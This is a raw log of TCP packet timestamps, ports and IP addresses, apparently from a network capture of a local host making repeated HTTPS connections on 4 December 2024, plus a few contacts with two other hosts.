                                                                                                                                                                                  Dec 4, 2024 11:11:37.478904963 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.478915930 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.478921890 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.482361078 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.482403040 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.482528925 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.482767105 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.482779026 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.660070896 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.660597086 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.660614014 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.661106110 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.661112070 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.766117096 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.766695023 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.766722918 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.767190933 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.767196894 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.936310053 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.938533068 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.938546896 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:37.938966036 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:37.938971043 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.228902102 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229094028 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229166985 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229542017 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229568958 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229609966 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229619980 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229645967 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.229667902 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.231008053 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.231455088 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.231455088 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.231482029 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.231492043 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.232371092 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.232388973 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.232398987 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.232405901 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.233675003 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.233691931 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.233983040 CET497406426192.168.2.4160.25.73.25
                                                                                                                                                                                  Dec 4, 2024 11:11:38.234131098 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.234136105 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.236838102 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.236869097 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.236944914 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.237411022 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.237421036 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.252861023 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.252906084 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.253021955 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.256835938 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.256850958 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.354058981 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.396935940 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.399342060 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.399384022 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.399473906 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.399473906 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.445687056 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.445723057 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.445743084 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.445749044 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.454178095 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.454220057 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.454319954 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.455065012 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.455080032 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666158915 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666265011 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666331053 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666635990 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666647911 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666656971 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.666661024 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.698431969 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.698472023 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:38.698539972 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.711951971 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:38.711973906 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.263628006 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.264275074 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.264292002 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.264746904 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.264751911 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.708389997 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711749077 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711803913 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711858034 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711875916 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711896896 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.711903095 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.714843988 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.714890957 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.714956045 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.715248108 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.715261936 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.953828096 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.956537008 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.956574917 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:39.956995010 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:39.957000971 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.038886070 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.044539928 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.044563055 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.044980049 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.044984102 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.172846079 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.176687002 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.176719904 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.177133083 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.177138090 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.388734102 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392343998 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392421961 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392466068 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392488956 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392499924 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.392504930 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.395658970 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.395683050 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.395745039 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.396090031 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.396102905 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.483272076 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486562014 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486615896 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486680984 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486727953 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486741066 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486752987 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.486757994 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.489422083 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.489439011 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.489517927 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.489664078 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.489676952 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.493045092 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.496387959 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.496401072 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.496807098 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.496810913 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.608407021 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.611644030 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.611747026 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.611984015 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.612006903 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.612018108 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.612024069 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.615005016 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.615067005 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.615144014 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.615354061 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.615367889 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.939352989 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.942663908 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.942825079 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.953996897 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.953998089 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.954027891 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.954037905 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.957321882 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.957356930 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:40.957423925 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.957823038 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:40.957835913 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:41.002129078 CET4974280192.168.2.4178.237.33.50
                                                                                                                                                                                  Dec 4, 2024 11:11:42.111007929 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.111465931 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.111490965 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.111938000 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.111943007 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.273001909 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.273469925 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.273509979 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.273960114 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.273971081 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.331933022 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.332672119 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.332709074 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.333023071 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.333029032 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.545433044 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.549345970 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.552131891 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.552172899 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.552184105 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.552192926 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.552197933 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.554760933 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.554799080 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.554862022 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.555020094 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.555032969 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.684386969 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.684962988 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.685004950 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.685640097 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.685646057 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.717597008 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720594883 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720665932 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720725060 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720746994 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720765114 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.720771074 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.723622084 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.723663092 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.723747969 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.723912001 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.723929882 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.766982079 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.770747900 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.770807981 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.771014929 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.771035910 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.771048069 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.771053076 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.775085926 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.775137901 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:42.775190115 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.775371075 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:42.775386095 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.119060993 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.122572899 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.124151945 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.124202967 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.124228001 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.124239922 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.124245882 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.126739025 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.126791954 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:43.126857042 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.127027035 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:43.127039909 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.420743942 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.428425074 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.428442001 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.432467937 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.432472944 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.441703081 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.448112011 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.448132038 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.449750900 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.449758053 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.557297945 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.569987059 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.570000887 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.571079016 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.571084976 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.843261003 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.865645885 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.868638039 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.868690968 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.868777990 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.880479097 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.885277987 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.885371923 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.891412973 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.891427994 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.892246008 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.892254114 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.892641068 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.892658949 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.916199923 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.916222095 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:44.916235924 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:44.916243076 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.001590967 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.003021955 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.003052950 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.003139019 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.004163980 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.004175901 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.004936934 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.004983902 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005038977 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005048037 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005094051 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005088091 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005172968 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005179882 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.005187988 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.006865978 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.006881952 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.006892920 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:45.006897926 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:45.009135962 CET49978443192.168.2.413.107.246.63
